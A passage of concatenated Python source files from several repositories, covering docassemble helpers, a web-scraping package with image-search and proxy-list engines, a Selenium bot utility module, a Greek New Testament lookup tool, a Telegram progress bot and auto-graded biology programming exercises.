pass
########################################################
# Miscellaneous functions needed for baseline questions
# These could go in toolbox but keeping here to reduce packages
# needed for baseline running.
def will_send_to_real_court() -> bool:
"""Dev or root needs to be in the URL root: can change in the config file"""
return not ('dev' in get_config('url root') or
'test' in get_config('url root') or
'localhost' in get_config('url root'))
# This one is only used for 209A--should move there along with the combined_letters() method
def filter_letters(letter_strings: Union[List[str], str]) -> str:
"""Used to take a list of letters like ["A","ABC","AB"] and filter out any duplicate letters."""
# There is probably a cute one liner, but this is easy to follow and
# probably same speed
unique_letters = set()
if isinstance(letter_strings, str):
letter_strings = [letter_strings]
for string in letter_strings:
if string: # Catch possible None values
for letter in string:
unique_letters.add(letter)
try:
retval = ''.join(sorted(unique_letters))
except:
retval = ''
return retval
# Note: removed "combined_locations" because it is too tightly coupled to MACourts.py right now
def fa_icon(icon:str, color:str="primary", color_css:str=None, size:str="sm"):
"""
Return HTML for a font-awesome icon of the specified size and color. You can reference
a CSS variable (such as Bootstrap theme color) or a true CSS color reference, such as 'blue' or
'#DDDDDD'. Defaults to Bootstrap theme color "primary".
"""
if not color and not color_css:
return ':' + icon + ':' # Default to letting Docassemble handle it
elif color_css:
return '<i class="fa fa-' + icon + ' fa-' + size + '" style="color:' + color_css + ';"></i>'
else:
return '<i class="fa fa-' + icon + ' fa-' + size + '" style="color:var(--' + color + ');"></i>'
def is_phone_or_email(text:str)->bool:
"""
Returns True if the string is either a valid phone number or a valid email address.
Email validation is extremely minimal--just checks for an @ sign between two non-zero length
strings.
"""
if re.match("\S+@\S+", text) or phone_number_is_valid(text):
return True
else:
validation_error("Enter a valid phone number or email address")
def github_modified_date(github_user:str, github_repo_name:str)->Union[DADateTime, None]:
"""
Returns the date that the given GitHub repository was modified or None if API call fails.
Will check for the presence of credentials in the configuration labeled "github readonly"
in this format:
github readonly:
username: YOUR_GITHUB_USERNAME
password: <PASSWORD>
type: basic
If no valid auth information is in the configuration, it will fall back to anonymous authentication.
The GitHub API is rate-limited to 60 anonymous API queries/hour.
"""
github_readonly_web = DAWeb(base_url="https://api.github.com")
res = github_readonly_web.get("repos/" + github_user + '/' + github_repo_name, auth=get_config("github readonly"))
if res and res.get('pushed_at'):
return as_datetime(res.get('pushed_at'))
else:
return None
``` |
{
"source": "A2Media-id/spidery",
"score": 3
} |
#### File: spider/images/__init__.py
```python
from abc import ABC, abstractmethod
from typing import List
from spidery.spider.engine import BaseCrawl
from spidery.spider.resource import DataImage
class ImageEngine(BaseCrawl, ABC):
def __init__(self, **kwargs):
super(ImageEngine, self).__init__(**kwargs)
self.max_page = kwargs.get('max_page', 2)
def search(self, term) -> List[DataImage]:
result = []
page = 1
while page <= self.max_page:
has_next, ret = self._loop_search(term, page)
result += ret
if not has_next:
break
page += 1
return result
@abstractmethod
def _loop_search(self, term: str, page: int) -> [bool, List]:
pass
```
#### File: spider/images/yahoo.py
```python
import html
import json
import logging
import re
import traceback
from typing import Dict, List
from urllib.parse import quote_plus, unquote
from spidery.spider.images import ImageEngine
from spidery.spider.resource import DataImage
class Engine(ImageEngine):
"""The resource quality of this engine is good, but the search is a bit slow (there are too many invalid resources)"""
_regex = r"\sdata='(\{[^\}]+\})'"
_limit = 25
_me = __file__
def _loop_search(self, term: str, page: int) -> [bool, List]:
result = []
api = 'https://images.search.yahoo.com/search/images'
params = {'q': quote_plus(term), 'b': page, 'count': self._limit,
'qft': '+filterui:imagesize-large', 'adlt': 'off', 'tab': 'organic',
'safeSearch': 'off'}
ret = self.get(url=api, params=params) # Both keywords and results must be gb2312 encoding
if not ret:
logging.error(f"Engine {self.me()} search failed: {term}")
return False, result
if not re.search(self._regex, ret.text, re.IGNORECASE | re.MULTILINE):
logging.error(f"Engine {self.me()} search failed: {term} server did not return results")
return False, result
items = re.findall(self._regex, ret.text)
if items:
items = set(map(html.unescape, items))
try:
while items and True:
try:
item: Dict = json.loads(items.pop())
dat = DataImage(engine=self.me())
for k, v in item.items():
value = unquote(v).strip() if (v and type(v) == str) else v
if k == 'alt':
dat.title = value
dat.desc = value
elif k == 'ourl':
dat.url = value
elif k == 'rurl':
dat.source = value
if not dat.url:
continue
elif dat.url and self.blacklisted_domain(dat.url):
continue
else:
result.append(dat)
except KeyboardInterrupt:
return
except Exception as error:
logging.exception(
''.join(traceback.format_exception(etype=type(error), value=error, tb=error.__traceback__)))
raise
except Exception as error:
logging.exception(
''.join(traceback.format_exception(etype=type(error), value=error, tb=error.__traceback__)))
now_page, total_page = (page, self._limit)
has_next = (int(now_page) < int(total_page) and len(result)) # Whether there is a next page
logging.info(f"Engine {__class__.__module__} is searching: {term} ({now_page}/{total_page})")
return has_next, result
if __name__ == '__main__':
eng = Engine()
for news in eng.search('cicak'):
print(news)
```
#### File: spider/news/__init__.py
```python
import logging
import re
import traceback
from abc import abstractmethod, ABC
from typing import List
from bs4 import BeautifulSoup
from spidery.spider.engine import BaseCrawl
from spidery.spider.resource import DataNews, DataArticle
class NewsEngine(BaseCrawl, ABC):
_me = __file__
def __init__(self, **kwargs):
super(NewsEngine, self).__init__(**kwargs)
@staticmethod
def _get_all_images(soup: BeautifulSoup) -> List:
results = []
try:
attrs = ['src', 'data-src', 'data-srcset']
datas = soup.find_all('img') or []
added = set()
for i, im in enumerate(datas):
default_text = im.get('alt') or im.text
parent = im.parent
if not default_text and parent:
default_text = parent.string
text = str(default_text).replace('\n', '').strip()
for atr in attrs:
if not im.get(atr):
continue
ims = str(im.get(atr)).split()
for img in ims:
if re.search(r"https?://([A-Za-z_0-9.-]+)(\/[^\s]+)?", img, re.IGNORECASE) and img not in added:
image = re.sub(r"(,(w_\d+|ar_\d+:\d+)|\/w\d+$)", "", str(img).strip(), 0,
re.IGNORECASE | re.VERBOSE)
added.add(img)
results.append((image, text))
except Exception as error:
logging.error(
''.join(traceback.format_exception(etype=type(error), value=error, tb=error.__traceback__)))
finally:
return results
@abstractmethod
def get_detail(self, data: DataNews) -> DataArticle:
pass
@abstractmethod
def get_latest(self) -> List[DataNews]:
pass
```
#### File: spider/proxy/checkerproxy.py
```python
import logging
import re
import traceback
from spidery.spider.engine import ProxyEngine
from spidery.spider.resource import ProxyData
from spidery.utils.func import pad
class Engine(ProxyEngine):
_me = __file__
urls = ['https://checkerproxy.net/getAllProxy']
def __init__(self, **kwargs):
super(Engine, self).__init__(**kwargs)
def _parse_raw(self, html):
try:
archives = re.findall(r"(archive/\d{4}-\d{2}-\d{2})", html, re.IGNORECASE | re.MULTILINE)
for archive in archives:
headers = {
'authority': 'checkerproxy.net',
'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"',
'sec-ch-ua-mobile': '?0',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49',
'accept': '*/*',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': f'https://checkerproxy.net/archive/{archive}',
'accept-language': 'en-US,en;q=0.9',
}
proxies = self._get_json(f'https://checkerproxy.net/api/{archive}', headers=headers)
if proxies:
for _, proxy in enumerate(proxies):
try:
host, port = pad(str(proxy.get('addr')).split(':'), 2, None)
if not host:
continue
elif not port:
continue
yield ProxyData(**{
'host': host,
'port': port,
'country': proxy.get('ip_geo_iso'),
'type': 'https' if str(port) == '8080' else 'http',
})
except Exception as error:
logging.exception(
''.join(
traceback.format_exception(etype=type(error), value=error, tb=error.__traceback__)))
except Exception as error:
logging.exception(
''.join(traceback.format_exception(etype=type(error), value=error, tb=error.__traceback__)))
if __name__ == '__main__':
eng = Engine()
for proxy in eng.search():
print(proxy)
```
#### File: spidery/ua/agent.py
```python
import logging
import os.path
import pickle
import random
import re
import traceback
from spidery.utils.func import write_file, cap_sentence, num_to_alpha
from .device_type import DeviceType
UA_BIN = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'ua.bin')
class Agent:
user_agents = pickle.load(open(UA_BIN, 'rb'))
def __init__(self, **kwargs):
params = {
'name': kwargs.get('name', None),
'brand': kwargs.get('brand', None),
'brand_code': kwargs.get('brand_code', None),
'code': kwargs.get('code', None),
'type': kwargs.get('type', DeviceType.BROWSER),
'category': kwargs.get('category', None),
'engine': kwargs.get('engine', None),
'family': kwargs.get('family', None),
'family_code': kwargs.get('family_code', None),
'family_vendor': kwargs.get('family_vendor', None),
'is_crawler': kwargs.get('is_crawler', False),
}
self._filtered = self._parse_kwargs(**params)
def get_random(self):
return random.choice(self._filtered) if len(self._filtered) else None
def __gen_class__(self):
C_K = {}
C_C = {}
for i, x in enumerate(self.user_agents):
for kk, kv in x.items():
print({type(kv): kv})
C_K[kk] = C_K.get(kk) if kk in C_K.keys() else set()
if type(kv) == str and kv:
C_K[kk].add(kv)
if type(kv) == dict:
for ck, cv in kv.items():
C_C[ck] = C_C.get(ck) if ck in C_C.keys() else set()
if type(cv) == str and cv:
C_C[ck].add(cv)
print(C_C.keys())
write_file('A.txt', str('\n').join(C_K.keys()))
for k, v in C_K.items():
if len(v):
write_file(f'A-{k}.txt', str('\n').join(list(v)))
write_file('B.txt', str('\n').join(C_C.keys()))
for k, v in C_C.items():
if len(v):
write_file(f'B-{k}.txt', str('\n').join(list(v)))
al = ['A.txt', 'B.txt']
for x in al:
print(x)
if os.path.isfile(x):
ls = open(x).read().splitlines()
h = x.rstrip('.txt')
for c in ls:
cx = f'{h}-{c}.txt'
print({cx: os.path.isfile(cx)})
if os.path.isfile(cx):
ad = str(re.sub("[^0-9a-zA-Z]", " ", c, 0, re.IGNORECASE)).capitalize()
ad = str(re.sub("[^0-9a-zA-Z]", "", cap_sentence(ad.strip()), 0, re.IGNORECASE))
an = str(re.sub("[^0-9a-zA-Z]", "_", c, 0, re.IGNORECASE))
fn = f'{str(an).lower()}.py'
ss = open(cx).read().splitlines()
aa = f"""from enum import Enum\n\nclass {ad}(Enum):"""
cuks = set()
for ln in ss:
cuk = str(re.sub("[^0-9a-zA-Z]", "_", ln, 0, re.IGNORECASE)).upper()
if cuk in cuks:
continue
match = re.search(r"^(\d+)([^\n]+)?", cuk, re.IGNORECASE)
if match:
c_a, c_b = match.groups()
mod = str('_').join(num_to_alpha(c_a).split(','))
mods = [mod,
str(re.sub("[^0-9a-zA-Z]", "_", c_b, 0, re.IGNORECASE)).upper()] if c_b else [
mod]
cuk = str('_').join(mods).upper()
cuk = re.sub("(_){1,}", r"\1", cuk, 0, re.IGNORECASE)
aa += f"""\n\t{cuk}='{ln}'"""
cuks.add(cuk)
write_file(fn, aa)
def _parse_kwargs(self, **kwargs):
flag = []
try:
current = self.user_agents
for k, v in kwargs.items():
try:
v = v.value if hasattr(v, 'value') else v
if v is None:
continue
if type(v) == bool:
filtered = []
for x in current:
for vv in x.values():
if type(vv) == dict and k in vv.keys():
if vv[k] == v:
filtered.append(x)
else:
filtered = [x for x in current if
k in x.keys() and x[k] and (
v in x[k].values() if type(x[k]) == dict else x[k] == v)]
current = filtered
except Exception as error:
logging.exception(
''.join(traceback.format_exception(etype=type(error), value=error, tb=error.__traceback__)))
flag = [x.get('ua') for x in current]
except Exception as error:
logging.exception(
''.join(traceback.format_exception(etype=type(error), value=error, tb=error.__traceback__)))
finally:
return flag
if __name__ == '__main__':
ag = Agent()
print(ag.get_random())
print(ag.get_random())
``` |
{
"source": "a2mky/boatbot",
"score": 3
} |
#### File: boatbot/assets/utils.py
```python
from selenium import webdriver
import os
import htmlmin
from random import randint
import time
import yaml
def start():
"""Runs the bot."""
os.system('python3 bot.py')
def message(text):
"""Sends a message in the constant format."""
message = '[{}] {}'.format(time.strftime('%I:%M:%S'), text)
print(message)
def error(location=None):
"""Sends an error message."""
error_msg = 'Nut! An error occurred whilst running the script.'
if location:
message('{} ({})'.format(error_msg, location))
else:
message(error_msg)
def kill():
"""Kills all sessions to reduce lag."""
try:
os.system('pkill -f firefox')
except:
pass
def clean():
"""Cleans and reports if an error occurred"""
try:
kill()
except:
error('Cleaning Sessions')
def config():
"""Fetches information from the config."""
file = 'config.yaml'
try:
with open(file) as r:
data = yaml.load(r)
except:
error('Loading Config')
def profile():
"""Sets up the driver profile."""
profile = webdriver.FirefoxProfile()
profile.set_preference("permissions.default.image", 2)
profile.set_preference("permissions.default.stylesheet", 2)
profile.set_preference("javascript.enabled", False)
return profile
def webhook():
"""Gets the webhook url."""
data = config()
webhook = data['webhook_url']
return webhook
def voyage():
"""Gets the Voyage link."""
data = config()
voyage = data['voyage']
if not voyage:
error('Missing Voyage Link in config.yaml')
else:
pass
return voyage
def line():
"""Prints a line."""
line = '–––––––––––––––––––––––––––––––––––––––––'
print(line)
``` |
{
"source": "a2ohm/gnttb-cli",
"score": 4
} |
#### File: gnttb-cli/sub/get.py
```python
import gnttb.get
from tools import bcv
def get(args):
"""Get a verse given its bcv.
"""
verse = gnttb.get.get(args.bcv)
print('{} : {}'.format(bcv.bcv2str(verse.bcv), verse))
``` |
{
"source": "a2ohm/gnttb",
"score": 4
} |
#### File: gnttb/gnttb/sblgnt.py
```python
import os.path
import collections
# Define a namedtuple to store names of books in different edition
# of the New Testament.
BookNames = collections.namedtuple('BookNames', ['en', 'BJ'])
# List of books of the NT.
# - abbrevations used in files names
# - abbrevations used by the Bible de Jérusalem
sblgnt_books = collections.OrderedDict([
('01' , BookNames('Mt', 'Mt')),
('02' , BookNames('Mk', 'Mc')),
('03' , BookNames('Lk', 'Lc')),
('04' , BookNames('Jn', 'Jn')),
('05' , BookNames('Ac', 'Ac')),
('06' , BookNames('Ro', 'Ro')),
('07' , BookNames('1Co', '1Co')),
('08' , BookNames('2Co', '2Co')),
('09' , BookNames('Ga', 'Ga')),
('10' , BookNames('Eph', 'Ep')),
('11' , BookNames('Php', 'Ph')),
('12' , BookNames('Col', 'Col')),
('13' , BookNames('1Th', '1Th')),
('14' , BookNames('2Th', '2Th')),
('15' , BookNames('1Ti', '1Ti')),
('16' , BookNames('2Ti', '2Ti')),
('17' , BookNames('Tit', 'Tt')),
('18' , BookNames('Phm', 'Phm')),
('19' , BookNames('Heb', 'He')),
('20' , BookNames('Jas', 'Jc')),
('21' , BookNames('1Pe', '1P')),
('22' , BookNames('2Pe', '2P')),
('23' , BookNames('1Jn', '1Jn')),
('24' , BookNames('2Jn', '2Jn')),
('25' , BookNames('3Jn', '3Jn')),
('26' , BookNames('Jud', 'Jude')),
('27' , BookNames('Re', 'Ap'))])
def morphgnt_filename(book_id):
"""
return the MorphGNT filename of the given book id.
e.g. 1 will return "61-Mt-morphgnt.txt"
book_id is supposed to be one of sblgnt_book's keys (ie a string)
Fork from py-sblgnt by jtauber distributed under a MIT Licence (https://github.com/morphgnt/py-sblgnt)
"""
return "sblgnt/{}-{}-morphgnt.txt".format(
60 + int(book_id), sblgnt_books[book_id][0]
)
def morphgnt_rows(book_id):
"""
yield a dict for each MorphGNT/SBLGNT row in the given book id.
Fork from py-sblgnt by jtauber distributed under a MIT Licence (https://github.com/morphgnt/py-sblgnt)
"""
filename = os.path.join(
os.path.dirname(__file__),
morphgnt_filename(book_id),
)
with open(filename) as f:
for line in f:
yield dict(zip(
(
"bcv", "ccat-pos", "ccat-parse", #"robinson",
"text", "word", "norm", "lemma"
),
line.strip().split()
))
``` |
{
"source": "a2ohm/ProgressBot",
"score": 3
} |
#### File: a2ohm/ProgressBot/ProgressBot.py
```python
import emoji
import telepot
import traceback
from datetime import datetime, timedelta
class ProgressBot:
def __init__(self, task = "", updates = (0.1, 5*60)):
"""Init the bot."""
# Load the config file
self.loadConfig()
# Save parameters
self.task = task
self.update_percent_rate = updates[0]
self.update_time_rate = updates[1]
# Create the bot
self.bot = telepot.Bot(self.token)
# Create intern flags
self.F_pause = False
# F_silentMode: stay silent until the first tick. This is a
# trick to ignore commands send between two
# runs.
self.F_silentMode = True
# F_mute: turn it on to mute tick reports.
self.F_mute = False
def __enter__(self):
msg = "Hello, I am looking on a new task: <b>{task}</b>.".format(
task = self.task)
self.sendMessage(msg)
# Init the progress status
self.progress = 0
self.start_time = datetime.now()
self.last_percent_update = 0
self.last_time_update = self.start_time
# Start the message loop
# note: incoming message will be ignore until the first tick
# (in order to flush messages sent between two tasks)
self.bot.message_loop(self.handle)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is KeyboardInterrupt:
msg = "The task <b>{task}</b> was interrupted. :confounded_face:".format(
task = self.task)
else:
msg = "The task <b>{task}</b> is complete. :grinning_face_with_smiling_eyes:".format(
task = self.task)
self.sendMessage(msg)
return True
def loadConfig(self):
with open('./ProgressBot.cfg', 'r') as f:
for line in f.readlines():
if line[0] == '#':
continue
parsed_line = line.split('=')
if parsed_line[0] == 'token':
if len(parsed_line) == 2:
self.token = parsed_line[1].strip()
else:
raise ValueError("Please provide a valid tokken in ProgressBot.cfg")
if parsed_line[0] == 'chat_id':
if len(parsed_line) == 2:
self.chat_id = parsed_line[1].strip()
else:
# If the chat_id is empty, maybe it is because
# it is still unknown.
print("Hello, you didn't provide any chat_id. Maybe you do not know it. The get_chat_id in the tools directory may help you with this issue.")
raise ValueError("You have to provide a valid chat_id, use the get_chat_id script to get help with that.")
def sendMessage(self, msg):
# Emojize the message
msg = emoji.emojize(msg)
self.bot.sendMessage(self.chat_id, msg, parse_mode = "HTML")
def handle(self, msg):
content_type, chat_type, chat_id = telepot.glance(msg)
if not self.F_silentMode and content_type == 'text':
if msg['text'] == '/pause':
print("Task: pause")
self.F_pause = True
self.send_status(cmt = "pause")
elif msg['text'] == '/resume':
print("Task: resume")
self.F_pause = False
self.send_status(cmt = "resume")
elif msg['text'] == '/status':
self.send_status()
elif msg['text'] == '/mute':
self.F_mute = True
elif msg['text'] == '/unmute':
self.F_mute = False
# API
def info(self, msg):
msg = '<b>[Info]</b> ' + msg
self.sendMessage(msg)
def warning(self, msg):
msg = ':warning_sign: <b>[Warning]</b> ' + msg
self.sendMessage(msg)
def error(self, msg, force = True):
msg = ':fearful_face: <b> [Error]</b> ' + msg
self.sendMessage(msg)
def tick(self, progress):
# Turn off the silentMode
self.F_silentMode = False
# Update the progress
self.progress = progress
# Freeze if paused
while self.F_pause:
time.sleep(1)
# Check if a progress update is necessary based on progress
if self.progress - self.last_percent_update >= self.update_percent_rate:
self.send_status()
# Check if a progress update is necessary based on time ellapsed
if datetime.now() - self.last_time_update >= timedelta(seconds=self.update_time_rate):
self.send_status()
def send_status(self, cmt = "", force = False):
"""Send the current status of the task."""
# Return without sending anything if mute
if self.F_mute and not force:
return
# Send the current status
if cmt:
msg = "{timestamp} − {progress:3.0f}% ({cmt})".format(
timestamp = datetime.now().strftime('%H:%M:%S'),
progress = 100*self.progress,
cmt = cmt)
else:
msg = "{timestamp} − {progress:3.0f}%".format(
timestamp = datetime.now().strftime('%H:%M:%S'),
progress = 100*self.progress)
self.sendMessage(msg)
# Update progress status
self.last_percent_update = self.progress
self.last_time_update = datetime.now()
if __name__ == '__main__':
# Demo of ProgressBot
import time
task= "Example"
with ProgressBot(task, updates = (0.2, 60)) as pbot:
#for i in range(10):
# time.sleep(1)
# pbot.tick(progress = i/10)
# Test logging functions
pbot.info('This is an info.')
pbot.warning('This is a warning.')
pbot.error('This is an error.')
``` |
{
"source": "A2P2/learntools",
"score": 3
} |
#### File: learntools/python_tutorial/self_study.py
```python
from learntools.core import *
from learntools.core import tracking
import numpy as np
import matplotlib.pyplot as plt
def get_last_printed_string(i = -1):
#In is a global variable with inputs.
#global In
i = i - 1
output = In[i]
for line in reversed(output.split('\n')):
if line.startswith('print('):
string = line.replace('print(', '')[:-1]
return eval(string)
def are_strings_the_same(string1, string2):
string1_lower_no_space = string1.replace(' ', '').lower()
string2_lower_no_space = string2.replace(' ', '').lower()
if string1_lower_no_space == string2_lower_no_space:
return True
else:
return False
def get_print_output_colab(input_, **kwargs):
from google.colab import _message
nb = _message.blocking_request('get_ipynb')
for cell in nb['ipynb']['cells']:
if cell['cell_type'] == 'code':
for line in cell['source']:
if line.lower().startswith(input_):
#selects the string between parentheses in print()
print_str = line[line.find("(")+1:line.rfind(")")]
#print_str = line[6:-1]
output = eval(print_str, kwargs)
return output
class RNALength(EqualityCheckProblem):
_vars = ['RNA_length']
_hint = "Use the function len()."
_solution = CS('We do not provide the solution here')
correct_RNA = 'ACACGUCCAACUCAGUUUGCCUGUUUUACAGGUUCGCGACGUGCUCGUACGUGGCUUUGGAGACUCCGUGGAGGAGGUCUUAUCAGAGGCACGUCAACAUCUUAAAGAUGGCACUUGUGGCUUAGUAGAAGUUGAAAAAGGCGUUUUGCCUCAACUUGAACAGCCCUAUGUGUUCAUCAAACGUUCGGAUGCUCGAACUGCACCUCAUGGUCAUGUUAUGGUUGAGCUGGUGCAGAACUCGAAGGCAUUCAGUACGGUCGUAGUGGUGAGACACUUGGUGUCCUUGUCCCUCAUGUGGGCGAAAUACCAGUGGCUUACCGCAAGGUUCUUCUUCGUAAGAACGGUAAUAAAGGAGCUGGUGGCCAUAGUUACGGCGCCGAUCUAA'
_expected = len(correct_RNA)
class ArrayOperations(EqualityCheckProblem):
_vars = ['x_array', 'y_array', 'figure_2']
_hint = "You can first create a range using the function range(start, end, step). Then convert it to numpy array by passing the range to the np.array() function."
_solution = CS('We do not provide the solution here')
def check(self, x_array, y_array, fig):
import matplotlib
import matplotlib.pyplot as plt
correct_x = np.array(range(0,31,1))
correct_y = (correct_x*3)**2
assert isinstance(x_array, np.ndarray) and isinstance(y_array, np.ndarray), (
"`x_array` and `y_array` should be numpy arrays, not ({}, {})".format(type(x_array), type(y_array))
)
assert (x_array == correct_x).all(), ("Your `x_array` is not correct. Reminder: it should contain all integers between 0 and 30, including 0 and 30.")
assert (y_array == correct_y).all(), ("Your `y_array` is not correct. Check if you have performed all calculations correctly.")
assert isinstance(fig, type(plt.figure())), ("Check if your line for storing the plot in a vairable is correct, you now have variable {} and not a matplotlib figure".format(type(fig)))
plot = fig.get_axes()[0]
assert len(plot.get_lines()) == 1, "You should have plotted only one line"
x = plot.get_lines()[0].get_xdata()
y = plot.get_lines()[0].get_ydata()
assert (x == correct_x).all(), ("Check if you have correct data on the x-axis")
assert (y == correct_y).all(), ("Check if you have correct data on the y-axis")
assert 'x' == plot.get_xlabel().lower(), "You should have `x` on your x-label"
assert 'y' == plot.get_ylabel().lower(), "You should have `y` on your y-label"
class FirstLastElement(FunctionProblem):
_var = 'first_and_last'
_hint = ('''1) Remember that python starts counting from 0. 2) You can check the last element of a list using a notation like that `list_name[-1]`.''')
_solution = CS("""""")
_test_cases = [
([5,10,25,30,50], [5, 50 ]),
([1,1,1,1,1,1,1], [1,1]),
([5], [5, 5])
]
class CodonDict(EqualityCheckProblem):
_vars = ['codon_dict']
_hint = "Check how to create a dictionary in the tutorial notebook."
_solution = CS('We do not provide the solution here')
def check(self, codon_dict):
correct_dict = {'UCA' : 'Ser','GCC' : 'Ala','CGA' : 'Arg',
'UUU' : 'Phe','GGG' : 'Gly','AAG' : 'Lys',
}
shared_items = {k: correct_dict[k] for k in correct_dict if k in codon_dict and correct_dict[k] == codon_dict[k]}
correct_strings = ['Codon {} codes the {} amino acid.'.format(codon, aa) for codon, aa in correct_dict.items()]
assert len(codon_dict) == len(correct_dict), ("Your dictionary should have {} elements but it has {}"
.format(len(correct_dict), len(codon_dict)))
assert len(shared_items) == len(correct_dict), ("Your dictionary has {} elements but only {} correct elements. Check the spelling."
.format(len(codon_dict), len(shared_items)))
#TODO fix the check for printing.
# local_vars = locals()
# assert any([are_strings_the_same(correct_string, get_print_output_colab("print('c", **local_vars)) for
# correct_string in correct_strings]), ("`codon_dict` is defined correctly but the final sentence is not correct, perhaps you have a typo?")
class YeastCompetition(EqualityCheckProblem):
import matplotlib.pyplot as plt
import matplotlib
_vars = ['figure_5a']
_hint = '''Check the plotting exercise in the tutorial. You should run the function plt.plot() to plot each line
and create x and y-labels using plt.xlabel() and plt.ylabel()'''
_solution = CS('We do not provide the solution here')
def check(self, fig):
import matplotlib.pyplot as plt
import matplotlib
time = [0, 12, 24, 36, 48, 60, 72, 84, 96]
co2_strain1 = [0, 0.8, 2.5, 3.8, 4.5, 4.9, 5.0, 5.2, 5.3]
co2_strain2 = [0, 0.1, 0.3, 0.6, 1.0, 1.4, 1.8, 2.2, 2.6]
assert isinstance(fig, type(plt.figure())), ("Check if your line for storing the plot in a vairable is correct, you now have variable {} and not a matplotlib figure".format(type(fig)))
plot = fig.get_axes()[0]
assert len(plot.get_lines()) == 2, "You should have plotted two different lines."
markers = [line.get_marker() for line in plot.get_lines()]
assert markers != ['-', '-'], "You should plot the data as points, not lines."
assert markers == ['o', 'o'], "You should plot the data as points."
for line in plot.get_lines():
x = line.get_xdata()
y = line.get_ydata()
assert (x == time).all(), ("Check if you have correct data on the x-axis")
assert any(
[
(y == co2).all() for co2 in [co2_strain1, co2_strain2]
]), ("One of the lines does not have correct data.")
assert 'time' in plot.get_xlabel().lower(), "You should have the word time with units in your x-label."
assert 'co2' in plot.get_ylabel().lower(), "You should have the word CO2 with units in your y-label."
class YeastCompetition2(EqualityCheckProblem):
import matplotlib.pyplot as plt
_vars = ['figure_5b']
_hint = "To add element to a list use the .append() function."
_solution = CS('''
The new points are probably a measurment artifact,
since the amount of CO2 couldn't decrease biologically in this experiment.''')
def check(self, fig):
import matplotlib.pyplot as plt
time = [0, 12, 24, 36, 48, 60, 72, 84, 96, 108]
co2_strain1 = [0, 0.8, 2.5, 3.8, 4.5, 4.9, 5.0, 5.2, 5.3, 4.0]
co2_strain2 = [0, 0.1, 0.3, 0.6, 1.0, 1.4, 1.8, 2.2, 2.6, 0.3]
assert isinstance(fig, type(plt.figure())), ("Check if your line for storing the plot in a vairable is correct, you now have variable {} and not a matplotlib figure".format(type(fig)))
plot = fig.get_axes()[0]
assert len(plot.get_lines()) == 2, "You should have plotted two different lines."
markers = [line.get_marker() for line in plot.get_lines()]
assert markers != ['-', '-'], "You should plot the data as points, not lines."
assert markers == ['o', 'o'], "You should plot the data as points."
for line in plot.get_lines():
x = line.get_xdata()
y = line.get_ydata()
assert (x == time).all(), ("Check if you have correct data on the x-axis")
assert any([(y == co2).all() for co2 in [co2_strain1, co2_strain2]]), (
"One of the lines doesn't have correct data."
)
assert 'time' in plot.get_xlabel().lower(), "You should have the word time with units in your x-label."
assert 'co2' in plot.get_ylabel().lower(), "You should have the word CO2 with units in your y-label."
class SubstrateInhibition(EqualityCheckProblem):
_vars =['michaelis_menten','mm_substrate_inhibition']
_hint = ("1) Copy paste the michaelis_menten fucntion from the tutorials. Use it as a basis for the substrate_inhibition function."
"2) Be careful with the order of math operations. "
"3) Pay attention to the order of the input arguments (S, Vmax, Km, Kinh)")
_solution = CS("""""")
def check(self, mm, substrate_inhibiton):
def correct_substrate_inhibition(S, Vmax, Km, Kinh):
v = Vmax * S / (Km + S * (1 + S / Kinh))
return round(v,2)
def correct_mm(S, Vmax, Km):
v = Vmax * S / (Km + S)
return round(v,2)
assert (round(mm(50, 100, 5),2) == correct_mm(50, 100, 5)), "Check your `michaelis_menten` function"
assert (round(mm(10, 50, 25),2) == correct_mm(10, 50, 25)), "Check your `michaelis_menten` function"
assert (round(substrate_inhibiton(1, 10, 0.2,5),2)== correct_substrate_inhibition(1, 10, 0.2,5)), "Check your `mm_substrate_inhibition` function"
assert (round(substrate_inhibiton(10, 50, 5,5),2)== correct_substrate_inhibition(10, 50, 5,5)), "Check your `mm_substrate_inhibition` function"
class SubstrateInhibitionPlots(EqualityCheckProblem):
import matplotlib.pyplot as plt
_var = 'figure_6b'
_hint = '''Use a numpy array (np.array) to define the substrate range. If you get stuck with plotting check how it was done in the tutorial.'''
_solution = CS("""
Substrate inhibition kinetics achieves flatter response in certain substrate ranges. \n
For example, see the range from 30 μM to 50 μM. \n
According to she standard Michaelis-Menten kinetics the rate changes from ~25 to ~35 μM/min (an increase by 40%!), \n
while in case of substrate inhibition kinetics the rate only slightly varies around 23 μM/min
""")
def check(self, fig):
vmax_km_kinh = [(50, 25, None),(50, 25, 10),(50, 25, 75)]
def correct_function(S, Vmax, Km, Kinh):
if Kinh == None:
v = Vmax * S / (Km + S)
return v
else:
v = Vmax * S / (Km + S * (1 + S / Kinh))
return v
assert isinstance(fig, type(plt.figure())), ("Check if your line for storing the plot in a vairable is correct, you now have variable {} and not a matplotlib figure".format(type(fig)))
plot = fig.get_axes()[0]
assert len(plot.get_lines()) == 3, "You should have plotted two different lines."
for line in plot.get_lines():
x = line.get_xdata()
y = line.get_ydata()
assert (x[0] == 0) and (x[-1] == 100), ("The first and the last points on the x-axis should be 0 and 100 respectively.")
assert any([( abs(y - correct_function(x, Vmax, Km, Kinh))<0.01 ).all() for (Vmax, Km, Kinh) in vmax_km_kinh])
assert plot.get_xlabel() is not None, "You should add a proper x-label."
assert plot.get_ylabel() is not None, "You should add a proper y-label."
qvars = bind_exercises(globals(), [
RNALength,
ArrayOperations,
FirstLastElement,
CodonDict,
YeastCompetition,
YeastCompetition2,
SubstrateInhibition,
SubstrateInhibitionPlots,
],
var_format='ex_{n}',
var_names = ['ex_1', 'ex_2', 'ex_3','ex_4','ex_5a', 'ex_5b', 'ex_6a', 'ex_6b']
)
__all__ = list(qvars)
def count_solved_exercises(exercises = __all__):
results = []
for ex in exercises:
if ex.startswith('ex'):
try:
result = eval(ex + "._last_outcome")
if result == tracking.OutcomeType.PASS:
results.append('Correct')
else:
results.append('Not correct or not solved')
except:
pass
return results.count('Correct')
feedback_options = {(8,8) : "Really great job!",
(5,7) : "You did a good job! You could try a bit more and maybe ask advice from teaching assistants or fellow students to get everything done.",
(1,5) : "You have solved some exercises. Perhaps you need to spend more time with the exercises or ask for help from teaching assistants or fellow students to get a better understanding.",
